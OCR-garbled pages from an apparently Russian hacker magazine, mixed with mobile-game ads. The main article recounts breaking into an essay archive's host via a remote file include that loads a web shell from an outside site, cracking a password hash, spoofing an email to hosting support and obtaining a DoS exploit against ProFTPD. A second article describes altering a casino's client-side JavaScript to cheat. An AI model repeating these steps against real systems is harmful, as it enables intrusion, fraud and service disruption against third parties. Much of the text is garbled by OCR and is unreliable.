ЛИСТА РАБОТЫ, НАХОДЯЩЕЙСЯ НА САЙТЕ ѴѴѴѴѴѴ.ТАВОЕТ.СОМ (НАЗВАНИЕ ИЗМЕНЕНО ПО ГУМАННЫМ ПРИЧИНАМ). ЗАНЯТЬСЯ 
МНЕ БЫЛО НЕЧЕМ (ВЕДЬ Я ЖЕ СТУДЕНТ-ОТЛИЧНИК И ДАВНО ПОЛУЧИЛ АВТОМАТ), ДА И НЕ КАЖДЫЙ ДЕНЬ МЕНЯ ПРОСЯТ О 
МЕЛКИХ ПАКОСТЯХ, ПОЭТОМУ БЫСТРО СОГЛАСИЛСЯ ЗА ЯЩИК ЛИМОНАДА ВЫПОЛНИТЬ ЕГО ПРОСЬБУ. 



Н разу же у меня в голове мелькнула 
мысль: «А нет ли этого реферата в 
каком-либо другом архиве?» . Если 
это так, то мне пришлось бы расширить диа- 
пазон своей атаки. После полуторачасового 
поиска в яндексе и гугле оказалось, что мне 
повезло — такой реферат был только на од- 
ном сайте. Я успокоился, так как объем моей 
будущей работы существенно сократился. 
Итак, контент сайта передо мной. Сперва 
мне подумалось, что на портале установлен 
некий движок, через который администра- 
торы редактируют архив с рефератами. Не 
тратя времени зря, я приступил к исследо- 
ванию сайта на бажные скрипты, но был оза- 
дачен — все страницы выполнены в ИітІ. Это 
говорило о том, что админ заливает все пос- 
редством ТСр. «Ну что же, поищем зацепки 
еще где-нибудь», — подумал я и, воспользо- 



вавшись сервисом сІотаіпзсІЬ.пеІ . получил 
список доменных имен. По выданным мне 
адресам находились сайты, гордо хранящие 
свои файлы на хостинге ѵірзегѵег.ги . клиен- 
том которого являлся и нужный нам архив 
рефератов. 

Получив достаточно ценную информацию, 
я забрался на свой приватный дедик и, не 
раздумывая, запустил скрипт ІпеіСгаск-регІ 
от ЫЗЭ, производящий поиск дырявых фо- 
румов по адресам из файла. 

По завершению его работы у меня не было 
ни одной зацепки — все форумы нахостинге 
были пропатчены. Но я не отчаивался. Было 
принято решение воспользоваться гуглом 
для поиска бажных сценариев. В этот мо- 
мент мне очень вовремя попалась под руку 
утилиткадООдІіпк, автором которой является 
Эг_1Ло_51. 



О Победы и поражения 

Осилив написание этой маленькой удобной 
штучки, было решено произвести поиск на 
явно открытый инклуд-баг. Запрос был следу- 
ющим: «іпигІ:$зііе», где $зііе — имя ресурса 
из уже известного списка. После заверше- 
ния работы дООдІіпк и анализа созданного 
лог-файла, был найден интересный скрипт: 
Иаскте.сот/аатез/аате.р1ір?сІ=аате5. 

Ытк Этот линк очень похож на инклуд-баг, 
но я сперва не поверил, что найду его здесь и 
сейчас. Однако после копирования ссылки в 
мой браузер передо мной действительно был 
элементарный инклуд-баг. Как оказалось, 
скрипт мог инклудить любой файл с расшире- 
нием біппі, втом числе документы со сторонне- 
го сайта. Этим я и воспользовался. Залив на 
сайт ѵзетЬаѵаса.пагосІ.ги веб-шелл от РЗТ/ 
ОНО, предварительно сменив его расшире- 
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РЕФЕРАТОВ ЗАХОТЕЛОСЬ? 




> Веб-статистика на сайте ІагдеІ.сот 



ние с рНр на ІТтІ, я подставил ІІРІ_ до своего шелла параметру сі в 
скрипте дате.рНр, получив полноценный ѴѴеЬ-зНеІІ ІгДр://Ітаскте. 
сот/аатез/аате.рІтр?сІ=ІтДр://ѵзетЬауаса.пагосІ.ги/зІте11 . 
Вскрытие показало, что скрипт дате.рМр запускался с правами 
поЬосІу. В голову сразу пришла мысль применить какой-либо ло- 
кальный эксплоит, но все мои усилия были потрачены впустую. 
Для ядра 2.4.215.0.2.ЕІ_зптр эксплоита не было, поиск суидных 
бинарников так ничего и не дал, а запущенные демоны являлись 
абсолютно неуязвимыми. К счастью, я мог просматривать любые 
файлы в веб-каталогах. 

О В поисках админки 

Перейдя в ОООВ! МЕІ\ІТ_РЮОТ портала рефератов, ничего инте- 
ресного я не нашел, однако мне очень приглянулась папочка рб, 
плохо лежащая в корне каталога. Как оказалось, в ней пылился 
ничем не примечательный файл сі.ріезк-зіаі со следующим содер- 
жанием: 



Как видишь, это был ІѴЮ5-хэш какого-то пароля. Что это за пароль, 
я пока не знал, но руки чесались скормить его Джонику. Это и было 
сделано. Спустя 1 5 минут пароль был обручен (он оказался наудив- 
ление простым), но я так и не мог понять, откуда этот пассворд. КЙр 
и прочим сервисам пароль не подходил. Хотя в процессе поиска в 
веб-директории сайта и была замечена папка ріезк-зіаі, однако в 
ней ничего не лежало. В моей сонной голове промелькнула мысль 
обратиться к этой папке через ѴѴѴѴѴѴ по ссылке ІтДр:/Лагае1.сопп/ 
ріезк-зіаі/ . Невероятно, но я попал на страницу авторизации, куда 
успешно был введен добытый потом и кровью логин и пароль. Меня 
тотчас же перекинуло на статистику обращений к сайту (ну и хитер 
же этот ріезк). Статистика оказалась достаточно интересной. Вы- 
яснилось, что она отображала не только файлы, запрашиваемые 
халявщиками-студентами, но и записывала все виды запросов, в 
том числе и ѲЕТ/Р08Т-реквестов со всеми передаваемыми пара- 
метрами. Через некоторое время в логахбыло найдено обращение 
к скрипту, расположенному по адресу ѵѵѵѵѵѵЧагаеІ.сот/геІасІтіп/ 
іпсіех.рітр . с хитрым параметром к=а0Ьас8с90Ье925139ШМ47а 
І320е0Ь. «Ура, админка!» — подумал я, но, к сожалению, такого 
скрипта в директории сайта не было. Параметром к, видимо, являл- 
ся ППСІ5-ХЭШ какого-то пароля. Но, увы, эти домыслы ни на милли- 
метр не приблизили меня к цели. Мне уже хотелось забить на все и 
пойти спать, но внезапно я вспомнил одну небольшую хитрость. 

О СоцИнженеры — вперед! 

Было решено посмотреть на результат команды «Іосаіе геТасІтіп/ 
іпбех.рИр». И, на мое счастье, на хостинге был найден Ьаскир это- 
го файла. Видимо, админ тестил какую-то ѴѴеЬ-панель, но затем 









Служба по/шержки: (495) 510-50-28 (9 00 -21 00 ); 
е-таіі: Ііе[р@пікі1:а.ги 
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Бильярд 

Предлагаем Вашему 
вниманию самый 
реалистичный бильярд 
для мобильных 
телефонов. Вы можете 
принять участие в 15 
различных видах игры, 
сражаясь не только с 
виртуальным 
противником, но и со 
своими друзьями. А 
настоящие поклонники 
бильярда смогут 
проводить целые турниры 
по любимой игре. 




Джонни Краш 
г Те: 
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покоряет Техас 

Джонни Краш опять в 
действии! Обалденная 
>а для одной кнопки. 
Гебе предстоит летать, 

] воровать штаны, ловить 
Торнадо и грозовые 
облака, пугать летчиков и 
кататься на грифах - 
только вовремя жми на 
^ кнопку. Твоя задача - 
улететь как можно 
дальше. Не оторваться! 
Лы играем всем офисом 
^(конечно, в свободное 
время:)! 
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I Нарды 
от Геймлофт 

| Самая популярная игра 
на твоем мобильном 
телефоне! Корни игры в 
і.Д нарды уходят в 
41 7А античные времена. 

Ч-і / о Теперь ты и сам сможешь 
играть в нарды на своем 
мобильном телефоне по 
всем официальным 
правилам, включая игру 
двумя кубиками. Игра 
захватывает дух! 




С.Т.А.Б. 

Эта игра заслуженно 
признана 

профессионалами лучшей 
мобильной игрой на 

I энный момент, 
ереально потрясающая и 
качественная графика. 
Кинг-Конг будет 
разрывать пасти 
І динозаврам, скакать по 
лианам и небоскребам как 
живой. Это игра, которой 
можно похвастаться. 

? Настоятельно 
рекомендуем. 



Горожане 3 

Самая лучшая стратегия 
для мобильных 
телефонов! Создавайте 
процветающие 
производства, стройте 
могущественные суда, и 
делайте благосостояние, 
торгуя со Старым Светом. 
Вы станете или 
уважаемым торговцем 
или печально известным 
безнравственным 
пиратом - Ваша судьба в 
Ваших руках! 



Касіпб Геѵег СТ 

Победи в 

высокоскоростной схватке 
с прыжками, 
столкновениями и даже 
ездой на двух колесах! 
Завоюй авторитет и 
поклонников на трех 
четких, тропических 
уличных трассах с более 
чем 18 миссиями! Одна из 
лучших гонок для 
мобильныхтелефонов- 
проверено. 






Видеопокер 

Игра видеопокер часть 1 
является компиляцией 
классического видео 
покера казино включая 
Джекпот, бонусные игры и 
іазличные особенности, 
іовершенствуй свои 
навыки на этом 
симуляторе, который 
отличается реалистичной 
и красивой графикой, 
звуковыми эффектами, о 
которых вы никогда не 
слышали и не видели на 
телефонах с поддержкой 
Іаѵа. 



Мировой 
футбол 2006 

Мировой футбол 2006 - 
воплощение Кубка Мира 
2006 по футболу в 
Германии. Все действие, 
стратегия и напряжение 
главного мирового 
футбольного события, 
подкрепленная живой 
анимацией игроков и 
прочими реалистичными 
деталями, которые 
требуется настоящему 
футбольному фанату. 



Бой 

за Атлантику 

Каждому школьнику 
известна игра "Морской 
Бой". Казалось бы, что 
может быть проще. Но 
этой игре стоит уделить 
особое внимание. Ведь 
здесь реализована 
полноценная сетевая игра. 
Ты можешь играть как с 
телефоном, так и с живым 
противником! 



Южный Парк 

Для тех кто хочет покуражиться вместе с героями Южного Парка! Целуй Венди или мисс Элис, 
но не трогай остальных! Толкай голодного Марвина от одной тарелки к другой . . .Собери все 
чистое бельишко, прежде чем его зальют кофе . . .и другие развеселые эпизоды из 
известного мультсериала. 4189 




_ Рагкап II. 
тН Саботаж в космосе 

Мобильная версия 
знаменитой Рі-игры! Это 
космическая стрелялка. 
Очень красивые пейзажи 
и море космических 
4167 судов и станций, которые 
тебе предстоит победить. 
" Тебе помогут 2 
уникальных корабля- 
спутника и твоя реакция. 
В конце каждого уровня 
- босс. В конце игры ты 
встретишь странное 
существо огромной силы. 
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Ледниковый 
период 2: 

Арктика в покате 

А вот и безумная 
саблезубая белка! Жадная 
до своих орехов, она и в 
этой игре как чокнутая 
носится в поисках чего 
погрызть. Чем больше 
орехов она соберет -тем 
выше результат. 
Невероятно простая и 
одновременно 
невероятно смешная и 
интересная игра. Да к тому 
же ещё и красивая до 
жути! 




Тош СІапсу'5 

І брііпіег СеІІ 
Спаоз ТНеогу 

Это 2007 год, это 
реальность. Единственный 
программист, знающий 
ключ к этой программе, 
обрушившей биржевой 
4185 азиатский рынок, был 
похищен таинственной 
[ организацией, чей целью 
является принесение хаоса 
I на планету. Ты должен 
| проникнуть к врагу и дать 
■ему бой, пока хаос еще 
■можно остановить. Ты - 
Сэм Фишер, отколовшаяся 
ячейка. 





Кинг-Конг 

Эта игра заслуженно 
признана 

профессионалами лучшей 
мобильной игрой на 
данный момент. 
Нереально потрясающая и 
качественная графика. 
Кинг-Конг будет 
разрывать пасти 
динозаврам, скакать по 
лианам и небоскребам как 
живой. Это игра, которой 
можно похвастаться. 
Настоятельно 
рекомендуем. 
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Кто хочет стать 
миллионером? 

Мобильная версия самой 
популярной 
телевизионной игры! 
Проверьте свои знания в 
попытке достичь 
заветной суммы. Всё 
точно как в шоу. Игра 
включает в себя все 

I особенности телешоу: 
три подсказки: 50/50, 
звонок другу или 
і помощь аудитории и 
I несколько сотен 
\ вопросов. Играйте всегда 
и везде! 




СаІІ ©# Оіііу 2 

В продолжении 
бестселлера 2004 года Вы 
выступаете в роли 
британского пехотинца, 
русского снайпера или 
американского рейнджера 
в битвах от Африки до 
Сталинграда и берегов 
Нормандии. Конечно, 

- один в поле не воин, 
поэтому Вас на поле боя 
будет сопровождать отряд 
верных однополчан. Такой 
воины на мобильных 
телефонах Вы еще не 
видели! 
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Миссия: 

Невыполнима-3 

Несомненно, одна из 
лучших игр, вышедших за 
последнее время. Вы - 
Итан Хант в официальной 
игре по 

кинематографическому 
блокбастеру Миссия: 
Невыполнима-3". Вам 
предстоит пройти 
множество уровней, 
побеждая врагов и решая 
интересные головоломки. 
Отлично реализованная 
графика доставит Вам 
немало удовольствия. 
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А{*е оі Ешрігез II 

Теперь величайшая 
стратегическая игра - и 
легенда среди 
компьютерных игр 
теперь приходит и в 
мобильном виде. Стань 
одним из известнейших 
правителей истории и 
построй свою империю, 
? которая смогла бы 
выдержать испытание 
временем в специально 
подготовленных 
сценариях, созданных 
для мобильной версии. 



Ілітіпе5 тоЫІе 

Лучшая логическая игра 
на 5опу Р5Р — І.итіпе$ — 
пришла на мобильные 
телефоны. Стильный хит, 
гениальное 
переосмысление Тетриса 
4188 включает в себя забойные 
музыкальные треки от 
известных ди-джеев Апсіу 
Нипіег и Мопбо Сгоззо. 
Увлекает с первых же 
секунд! Геймплей игры 
трудно описать словами, 
лучше попробовать 
самому. 




Принц Персии - два трона 

Мобильная версия всем известной РС-игры. Реализация - на высочайшем уровне, возможностей 
- хоть отбавляй. Это одна из лѵчших игр для мобильных телефонов в своем классе. Обо всем и не 
расскажешь. Это стоит попробовать хотя бы для того, чтобы представлять насколько хороши 
могут быть мобильные игры. 4186 

Бабло побеждает Зло 

Щ ппа "Ундервуд" представляет! Твое оружие - бабло. Используй подкуп, шантаж, взятки, акции, 
новники и крохоборы встанут на твоем пути — ~ - " 



Бабло -победит зло! 



средства хороши чтобы проникнуть в Кремль. 
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> На йѴй ты найдешь все 
тулзы, описанные в этой 
статье, помогавшие мне 
в нелегком взломе. 



гашгаазд 



> Все описанные в этой 
статье действия носят 
исключительно позна- 
вательный характер и 
направлены в первую 
очередь на исследо- 
вание слабых мест на 
хостингах. За приме- 
нение информации в 
незаконных целях автор 
и редакция ответствен- 
ности не несут. 



> Юзаем Веѵегзе ІР & І\ІЗІ_оокІІр ТооІ 



> Долгий брутфорс пароля 



удалил ѳѳ. «Надо восстановить!» — подумал я и решил 
накатать письмо саппорту хостинга с просьбой помочь 
криворукому ламеру. Воспользовавшись имеющимся 
локальным доступом, я быстренько родил письмо через 
его же зепсітаіі от имени администратора сайта-жертвы. 
Письмо было примерно следующего содержания: «Ува- 
жаемая Администрация, прошу восстановить, в связи с 
необходимостью, папку геіасітіп, которую я случайно уда- 
лил из моего ѴѴеЬ-каталога. Заранее благодарен». Более 
от меня ничего не зависило, поэтому я забил на все и от- 
правился спать. 

Прошел день. Этого времени вполне должно было хватить 
для восстановления небольшой папки. Я не ошибся. За- 
шел в каталог сайта с архивом рефератов, где в листин- 
ге папок присутствовала и папка геТасІтіп со всем своим 
контентом. Я быстренько побежал набивать в браузере 
путь заветного скрипта. Передо мной появилась форма 
ввода логина и пароля. Я посмотрел исходник документа, 
вычленил оттуда сценарий назначения и обратился к нему 
ОЕТ-запросом с логином асітіп и скриптованным паролем 
(если ты помнишь, этот хэш у меня был). Несмотря на мои 
старания, меня послали куда подальше. Оказалось, что 
это были скрипты, поставляемые хостером при регистра- 
ции сайта, и они чем-то напоминали СРапеІ. Логин я знал, 
поскольку он был прописан в конфиге. А пароль, стало 
быть, когда-то служил кейвордом для этого сервиса. Ко- 
роче говоря, этой админкой нельзя было перезаписать 
нужный файл. 

В голову пришла только одна идея — вывести из строя 
хостинговый фэсі. Тогда можно было бы накатать еще одно 
гневное письмо техподдержке с просьбой вручную заме- 
нить нужный мне документ. Как оказалось, на хостинге 
вертелся сервер РгоРТРЭ 1 .2.10. 

О Дурим трейдеров 

У меня было два варианта: искать досер на сервис в паб- 
лике и заказывать ЭЭоЗ-атаку или порыскать на трейдер- 
ских каналах в ІРС. В публичных ресурсах были лишь кос- 
венные статьи на уязвимости, на аренду ботнета не было 
денег (да и ящик лимонада не окупился бы :)), а вот насчет 
трейдеров на ІРС у меня была идея. 

На самом деле трейдинг — это отдельная тема для ста- 
тьи. Она не раз уже освещалась, поэтому я предполагаю, 
что ты немного с этим знаком. На мои слезные поиски 
ЭоЗ’ера для РгоРТРЭ откликнулись несколько жадных 
буржуев. Они предлагали один и тотже продукт, но взамен 
требовали солидных чаевых, которых у меня не было. Но, 
к счастью, у меня была одна хитрость. Чтобы убедиться, 
что ЭоЗ’ер действительно работает, я попросил убить 



якобы мой РгоРТРЭ (надеюсь, ты уже понял, что за демон 
я попросил завалить :)). Пара отморозков сразу куда-то 
подевались, а один честный товарищ скопировал мне 
логи, доказывающие, что эксплоит работает. Но теперь 
уже куда-то подевался я :). 

О И снова Зиррогі 

Оставалось написать слезное письмо и ждать, пока сап- 
порт поднимет РТР и заменит чудо-сочинение. В моей 
голове витала мысль, что техподдержка просто оживит 
РгоРТРЭ и на этом успокоится. Ан нет, к вечеру работа 
была заменена моим релизом. Теперь мне ничего не оста- 
валось, как стукнуть другану в аську и гордо написать клю- 
чевое слово «сіопе». А если бы РгоРТРЭ просто подняли, я 
бы еще раз зашел на ирк и попросил уже другого барыгу 
показать сплоит в действии. И так до истечения терпения 
бедной техподдержки. 

Но все хорошо, что хорошо кончается. Чувак успешно 
сдал реферат, поимев взамен законные 5 баллов, я полу- 
чил обещанный ящик лимонада, а ты — прекрасную ста- 
тью очередного взлома, которой бы не было без знаний 
І_іпих и приемов социальной инженерии. ПЕ 
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Как известно, Ооодіе — это очень мощное хакерское ору- 
жие. Мощность ему придает дикое количество поисковых 
параметров. дООдІіпк же является изящной консольной I 
утилиткой для поиска в Ооодіе. Основная ее задача — вы- 
давать найденные ссылки в зісіоиі (то есть вывод в консоль). | 
Очень удобно использовать ее в комбинации с другими 
программами, что я и собирался сделать. Вот небольшой 
скриптик, который передает дООдІіпк параметры запуска и 
записывает ответ в лог-файл. 

#!/изг/Ьіп/регІ 

ореп(І_,”>>Іод”); 

ореп(5,”зіІез”); 

@зіІез=<8>; 

ТогеасГі $зііе @зііез{ 

@ехес=' ./дООдІіпк -ц "іпигІ:$зіІе"'; 
ргіпіІ_@ехес; 

ргіпіІ_“ АпѴі”; 

} 

сІозе(Ь); 

сІозе(З); 
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Новое измерение 



^Сканирования документов на рабочем 
месте: сканеры Риііізи ІІ-5ШС и ІІ-5220С 

скорость сканирований до ЗД страниц или ЕО образов' в 
минуту (ѳ чесжо-бепом и цветном режиме сканирования, 
с учетом оттенков икапы серого цвета) 
эксклюзивно для данного класса сканеров, 
ультразвуковой контроль двойкой подачи бумаги 
сканирование станы бумажны* документов разного 
формата и качества, даже кредитив* карточек и 
карточек, клиентов 

соответствие европейским экологическим нормам Яп Не- 
полная версий Айосе Дсгоюаі 7,0 Йапсіагсі 
модель П-51 ЭОС: автоподача бумаги и планшет 
опций для модели Е-5220С. принтер надпечаток 



И сточки к ; &сап п с МпГо^йд . Щ Ізи.сот 

Вйішё подробная т\ формации : і ѵвді 



НшВДнмцнй о гарантия* и сервисе, 
а тайнее а партнерах концерна Вы 
найдете в отйм.ГвІ.ІІцііІьи.саіі» 



Р - і іі р ' * н«н у -у- ■-,іі,т,» ■• •■ т-м-тігг» ѵ '-■■ ліирѵи ., -гпи.ѵи 

іюог^пмкш , ь-г -.^.ѵп, щ >№' ічс'льл С гтавоѵ юс«ж*чя 
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ВСЯ ПРАВДА О ВИРТУАЛЬНОМ КАЗИНО 



І.ЕХХ918 








ТЫ, НАВЕРНОЕ, ЗАМЕТИЛ, КАК ЗА ПОСЛЕДНИЕ ПАРУ ЛЕТ УВЕЛИЧИЛОСЬ КОЛИЧЕСТВО ИГРОВЫХ АВТОМАТОВ. Я ДАЖЕ 
В МАГАЗИН ЗА ХЛЕБУШКОМ СХОДИТЬ НЕ МОГУ, ЧТОБЫ НЕ ПРОЙТИ МИМО НЕСКОЛЬКИХ ТАКИХ АГРЕГАТОВ. И ПОТОМУ 
НЕУДИВИТЕЛЬНО, ЧТО ИГРОВАЯ ИМПЕРИЯ ДОБРАЛАСЬ И ДО НАШЕГО С ТОБОЙ ИНТЕРНЕТА. БИТЬ БИТОЙ ЖЕЛЕЗНЫЙ 
ЯЩИК НА УГЛУ СВОЕГО ДОМА НЕ ОЧЕНЬ-ТО СОЛИДНО, ЗАТО КУДА ИНТЕРЕСНЕЕ ДЕЛО ОБСТОИТ В СЕТИ, ГДЕ КАЖДЫЙ 
МАЛО-МАЛЬСКИ РАЗБИРАЮЩИЙСЯ ЮЗВЕРЬ ЗАПРОСТО МОЖЕТ НЕ ПРОСТО ПОДНЯТЬ СВОИ ШАНСЫ НА ВЫИГРЫШ, НО И 
ВООБЩЕ ВЫИГРАТЬ НЕ ИГРАЯ. 



ечта человека «чтоб все было, и за 
это ничего не было» давно уже при- 
носит горе и разочарование одним 
и безумные доходы другим. Азартные игры и 
во,сь игорный бизнес — наркотик. Иногда он 
даже куда страшнее, чем сигарета или игла. 
Всегда можно найти оправдание, всегда мож- 
но уйти. Но искушение халявы не отпускает, и 
ты лишь глубже вязнешь в этом болоте. 

Если мне не изменяет память, то пару лет на- 
зад (и наверняка сегодня) игорный бизнес во 
всем мире облагался налогом в 80%, и еще 
примерно столько же средств «по правилам 
игры» казино обязано отдать в качестве выиг- 
рыша самим игрокам. 

Выходит, что чистая прибыль составляет не 
более 4% от всех денег проходящих через 
«кассу». А теперь вспомни любое казино: ог- 
ромные здания и залы, неоновые вывески и 
шикарная внутренняя отделка, богатые кли- 
енты, зеленое сукно квадратными километ- 



рами застилает игорные столы... Как видишь, 
даже тех 4% вполне хватает, чтобы жить не 
просто безбедно, а очень и очень богато-. 
Понятно, что с появлением всемирной пау- 
тины азартные игры появились и в виртуаль- 
ном мире. Вот только деньги здесь вполне 
реальные. Не мне тебе рассказывать, что 
ѴѴеЬМопеу, Е-ОоІсІ и Яндекс-Деньги — это те 
же рубли, евро и доллары. «Так почему бы не 
попробовать ободрать тех, кому не по карману 
Лас-Вегас?» — подумали толстосумы и нача- 
ли расширять сферу деятельности, создавая 
одно оп-Ііпе казино за другим. 

Я не заядлый игрок. Да и не игрок, пожалуй, 
вовсе. Поэтому в поисках подопытного казино 
воспользовался всеми любимыми ѵа.ги и гО.ги . 
На мой запрос типа «оп-Ііпе казино ѵѵт» по- 
исковики выдавали преимущественно сайты 
в доменах третьего уровня. Забегая вперед, 
скажу, что это не те казино, что нам с тобой 
нужны (о них я расскажу немного позже). 



Продолжая поиск более-менее солидной 
конторы, я наткнулся на нормальные сайты, о 
которых и пойдет речь ниже. 

О Вероятность. Теория и практика 

ѴѴМІоШэ.сот и Шгех.ги . Первые два инте- 
ресных сайта, имеющие свои домены (а не 
банальные пагосі.ги или Мти). И тот, и другой 
привлек меня своей простотой и отсутствием 
излишних наворотов. Несколько стандарт- 
ных игр, различающихся только названиями и 
обложками: «Три туза», «Пиковая дама», «На- 
перстки» и другие. Смысл всех этих игр в том, 
чтобы угадать, в каком из нескольких предло- 
женных мест находится загаданный предмет 
(Туз, Дама или шарик). В случае проигрыша 
ты просто теряешь свою ставку. Выиграв, ты 
получаешь ее же, только умноженную на не- 
которое число. Как правило, это число равно 
общему числу вариантов выбора. 

Теперь самое интересное! Предположим, что 
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в игре имеется 3 варианта хода. Значит, наши 
шансы всегда будут составлять 1/3. А это, в 
свою очередь, значит, что, делая ставку на 
один и тот же вариант, мы каждый третий ход 
будем выигрывать (если, конечно, на сайте 
действительно работает «настоящий» ГСЧ- 
генератор случайных чисел и вместе с ним 
«нормальная» теория вероятности). Остав- 
шиеся два хода приводят к поражению. Одна 
победа «окупает» оставшиеся проигрыши на 
все 100%. В идеальном случае мы, сделав п- 
# ое число ставок, выиграем (п/3)*3 сумму или, 
если сократить тройки, уйдем с тем, с чем 
пришли. 

Глупость получается. А где же тогда доходы 
казино? Где сумасшедшие джекпоты? Обо 
всем по порядку... 

О Копаем глубже 

Выше я сделал уточнение, что наши расчеты 
действуют только при ГСЧ, без вмешатель- 
ства сторонних условий, скриптов и других 
факторов. Возникает вопрос: а действитель- 
но ли на сайте действует абсолютная случай- 
ность в выпадении цифр, карт и шариков под 
наперстками. Обо всем этом на 100% можно 
узнать, лишь покопавшись в исходных текс- 
тах самих игр сайта, доступа к которым нам 
с тобой, естественно, никто не даст! И хотя 
взлом и добыча сырцов — это отдельная тема 
для статьи, я все же расскажу тебе о ГСЧ на 
примере одной игры. Она с рождения немно- 
го дырявая, так что мы сможем изучить ее, а 
также внести изменения в код, повысив тем 
самым свой шанс на выигрыш. 

Игра «Больше — Меньше». Правила таковы: 
нам дается число (я так и вижу его перед гла- 
зами!) и еще одно число компьютер (на сер- 
вере, естественно) загадал для себя. Задача: 
отгадать, каким окажется загаданное число 
— больше нашего или меньше. Как я и писал 
выше, у нас два варианта хода и потому, в 
случае победы, ставка увеличивается вдвое. 
Но в отличие от тех же карт или наперстков в 
этой игре появляется неоднозначность — все 
ситуации уникальны и, хотя вариантов два, ве- 
роятность тут уже совершенно иная (так как 
"число, данное нам, меняется от хода к ходу). 
Так ли это? Лезем в исходники. 

УѴМІойо.сот оказался временно нерабо- 
чим, и я изучал эту игру на Шгех.ги . Открыв 
исходный текст страницы (ака НТМБ-код), я 
наткнулся на интересную функцию. 

Она генерирует то самое число (пит), кото- 
рое ты видишь на своем экране. И это то са- 
мое число, от которого зависит исход игры в 



принципе. Согласно правилам, комп на сер- 
ваке загадывает число от 1 до 1 00, а нам пред- 
лагает сыграть с числом от 5 до 95 (первая и 
вторая строки функции). Сохранив страницу 
на винт, я внес небольшие изменения в рабо- 
ту программы. Во-первых, все относительные 
пути зиЬтіі’а форм я поменял на абсолютные. 
А во-вторых, добавил еще одну строку « пит = 
5» в хвост функции: 

Теперь, если открыть страницу не на сайте, 
а с винта, то можно вечно играть с цифрой 5. 
Остается лишь ставить на «Больше» и выиг- 
рывать в 95% всех игр. Проверяем! 

Я закинул свои последние кровно зарабо- 
танные 2 рубля и 20 копеек на аккаунт в ка-> 
зино, запустил скрипт и стал тупо играть на 
«Больше». 

За всю игры выпало « + » 42 штуки (56%), «-» 

— 33 штуки (44%). Казалось бы, все отлично! 
Я даже остался в выигрыше, ведь побед было 
гораздо больше, чем поражений. Чуть позже 
ты поймешь, что это не так, да и все дело тут 
в размере ставки. Будь они все одинаковые, 
наши шансы сравнялись бы 50/50 или даже 
ухудшились. 

После анализа оказалось, что все мои про- 
игрыши были «сбиты» числом «3». То есть я, 
играя строго на число «5» в сторону повы- 
шения, половину игр проиграл, и виной тому 

— «случайно» загаданное число «3». Тебе 
не кажется странным, что компьютер, имея 
в своем распоряжении целых 4 цифры (1 , 2, 
3 и 4), «сбивал» мою ставку именно тройкой? 
Я сделал несколько ходов в сторону «Мень- 
ше», играя на числе 95. Тут все по-честному: 
меня обыграли 6 чисел, и они не были оди- 
наковыми. 

Во время игры я тщетно надеялся, что меня 
как-то попалят на попытке обмана. Напри- 
мер, можно было отслеживать поле ВЕРЕЯЕЯ 
в принимаемом НТТР-запросе. Но нет — все 
было путем! В поисках возможных скрытых 
полей защиты от обмана я наткнулся в скрип- 
те на такую строку: 



ѵагипід = "1149964285' 



Число ипіц передавалось серверу и проверя- 
лось там. Думаю, не надо тебе объяснять, что 
это за 10 циферок? 

Конечно, это те самые секунды, прошедшие 
со дня рождения ІІпіх в 1970-х годах. В моем 
любимом РНР это число возвращает всем из- 
вестная функция йте(). Но в этот раз я имел 
дело с ЗаѵаЗсгірі, поэтому пришлось срочно 
заменить эту строку на две вот такие: 



сІаіеѴаг = пеѵѵ Оаіе(); 



ипід = ЦаіеѴаг.деІТІте().Іо5ігіпд().зиЬзігіпд(0, 1 0); 



Первая строка создает объект для работы с 
датой и временем; вторая — возвращает те- 
кущее число секунд, преобразовывает их в 
строку, вырезает первые 10 символов (в ЗЗ’е 
функция деГПтеО возвращает 1 3 цифр — ви- 
димо, это число миллисекунд). 

В месте «ошибочного хода» мне вывалилось 
сообщение отом, что моя игра якобы уже игра- 
лась. Именно тогда я и полез искать (и нашел) 
эту самую переменную ипф. Очевидно, на 26 
ходу сработал таймаут, и сервер стал палить 
меня по устаревшей сессии 4-минутной дав- 
ности. Примерно столько ТСР-пакет может 
блуждать в сети до адресата (пока не умрет по 
таймауту в поле ТТІ_), и, как мне кажется, лишь 
поэтому первые 26 ходов не вызывали ошиб- 
ки. Следующие 6 ходов я сыграл, переписав 
поле ипф вручную, и только на 33 ходу внес 
автоматическую генерацию времени. Еще 
1 1 ходов после этого я с увлечением играл в 
эту «честную игру». Мой баланс увеличился 
вдвое, везение кончилось, и я медленно, но 
верно слил все деньги. Что, собственно, и тре- 
бовалось доказать! 

О Забрось свою сеть 

Думаешь, я сильно расстроился и моему воз- 
мущению не было предела? Ошибаешься! 
Ничего неожиданного я пока не встретил. 
Наоборот, появилось желание сыграть не в 
муху, а в паука, и наплести своих сетей. Са- 
мый верный способ — спросить у видавшего 
виды. К счастью, на сайте нашлись реквизиты 
Администратора (А) и Владельца (В) ресурса. 
«А к кому, как не к ним, можно еще лезть со 
своими глупыми вопросами?» — подумал я. 
Ниже я привожу это чисто импровизирован- 
ное интервью с двумя «воротилами игорного 
бизнеса»: 

Я: Хай! Я так понимаю, иіігех.ги — это ваша 
работа? Меня, в частности, интересует игра 
«Больше — Меньше». 

АдміІН: Это одна из моих работ. Что именно 
Вас интересует? 

Я: Теория вероятности, генератор случайных 
чисел, честность игры и прочее. Я готовлю 
статью в журнал и уже около двух часов играю 
в вышеупомянутую игру. Вся статистика запи- 
сана и будет выложена на обозрение народа 
в одном из летних номеров. Не буду вам (если 
вы автор скрипта) рассказывать о его «слу- 
чайностях, вероятностях» и прочих «честное- 
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тях», так как вы и сами в курсе. 

А: Я не автор скрипта. Одна из моих работ — в 
том смысле, что работаю я не только в этом 
казино. 

Я: Тогда сразу возникает второй вопрос: в ка- 
ких еще казино Вы работаете? 

А: тазіегзріп.щ 

Я: И там вы практикуете те же скрипты и сис- 
темы ГСЧ? 

А: Нет. Вы не путайте. Шгех — чисто рос- 
сийский проект. Мастерспин — самостоя- 
тельное казино с русской версией (оригинал 

— тазІегзріп.сот Т со своим ПО, ГСЧ и КЧ 
(Контроль Честности). Я же ничего не прак- 
тикую — всего лишь работник, а не програм- 
мист. Скрипты Шгех’а писались в России, 
Мастерспина — командой разработчиков из 
Израиля. 

Я: Можно поподробнее о разработчиках? Кто, 
откуда, сколько стоит и прочее. 

А: С этими вопросами Вам надо обратить- 
ся к владельцу иіігех.ги и в главный офис 
тазіегзріп.сот . Я, честно признаться, не 
могу Вам помочь в этом вопросе. Покупал и 
устанавливал скрипты на Шгех сам владелец 
проекта. Он же и разработал свои авторские 
скрипты — это не покупные «Масветы» и про- 
чая лабудень, а полностью самостоятельный 
проект. 

